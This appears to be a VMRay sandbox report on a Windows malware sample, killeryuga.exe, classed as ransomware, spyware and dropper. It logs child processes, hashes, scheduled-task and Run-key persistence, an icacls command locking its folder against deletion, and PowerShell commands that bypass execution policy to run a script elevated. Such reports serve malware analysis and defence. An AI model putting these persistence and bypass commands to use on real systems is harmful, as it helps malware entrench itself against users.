ac69e0f6...26b4 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Spyware, Ransomware, Trojan, Dropper, Backdoor

killeryuga.exe

Windows Exe (x86-32)

Created at 2019-03-24T16:35:00

...

Remarks (2/3)

(0x2000008): One or more processes crashed during the analysis. Analysis results may be incomplete.

(0x200000e): The overall sleep time of all monitored processes was truncated from "1 minute, 40 seconds" to "10 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e0 Analysis Target High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" -
#3 0x98c Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x99c Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x9d0 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask #5
#7 0x9d8 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #5
#8 0x9ec Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" #5
#9 0x9fc Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe" #5
#10 0xa0c Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin #8
#11 0xa18 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe" #5
#12 0xa38 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe" #5
#13 0xa4c Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #10
#14 0xb04 Child Process High (Elevated) powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}" #10
#16 0x780 Autostart Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart -
#18 0x588 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask #16
#19 0x5a4 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #16
#20 0x7a0 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #18

Behavior Information - Grouped by Category

Process #1: killeryuga.exe
848 2
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:22, Reason: Analysis Target
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:32
OS Process Information
»
Information Value
PID 0x8e0
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8E4
0x 8F0
0x 8F4
0x 8F8
0x 8FC
0x 900
0x 904
0x 910
0x 984
0x 988
0x 998
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00293F80 0x002D2EB3 Marked Executable - 32-bit - False
...
buffer 0x00293F80 0x002D2EB3 Content Changed - 32-bit 0x002948AB, 0x00293F80 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe 345.50 KB MD5: 55b42589931331c2929847c78d0933d5
SHA1: 904940b9ab5442595f75f6d6dfe46832569bc234
SHA256: ac69e0f6c8a697982a4897607ccd4def633354f6336a68985d48ae78920e26b4
SSDeep: 6144:CcygBt56u4UqjIC6ibJd9mke7R68W55C0aPCUN8VOuMua6oIHCKvFXT:3ygP5bq0C3JKJR68m5C76suMKoIH9XT 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB MD5: 74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5
SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9
SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB MD5: 5e31bed3dcccef21e35fb4760123ec80
SHA1: 9b71b827ebf51079bc9fc5a16f8e55632420973f
SHA256: 2b20e239286f1c2d4e92d6657cc4476dc410b74553fb57b53f11b5fbd7101466
SSDeep: 192:JBdGeOS2B5KSijSgSaSQSzSASxSXSUS8SRSnSfSfSVSZSKSjwSWASMSYSVSvSvSJ:rdGj5it8TTZ4R5/4 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB MD5: 6852149628dae385c68c7a9db7028560
SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb
SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4
SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG 		False
...
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4280555 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-03-25T03:38:09 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe True 1
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe - False 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, size = 218, type = REG_EXPAND_SZ True 1
Fn
Process (46)
»
Operation Process Additional Information Success Count Logfile
Create icacls os_pid = 0x98c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe show_window = SW_SHOW True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\windows photo viewer\departure-wm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft synchronization services\controllers.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\evaluating_explosion_former.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\kai.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\dvd_boom_scale.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\adaptation_sleeping_presentations.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\accommodation-throat-deviation.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\joseph.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows mail\byte-emergency-resulted.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\noble-technologies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\cardiovascularhear.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\assets_portion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\landgovernmental.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\packed bags.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\tale-plaintiff-basename.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (470)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 2
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 2
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 2
Fn
Load USER32.dll base_address = 0x74f40000 True 2
Fn
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74b50000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74b10000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74af0000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a90000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749d0000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 16
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
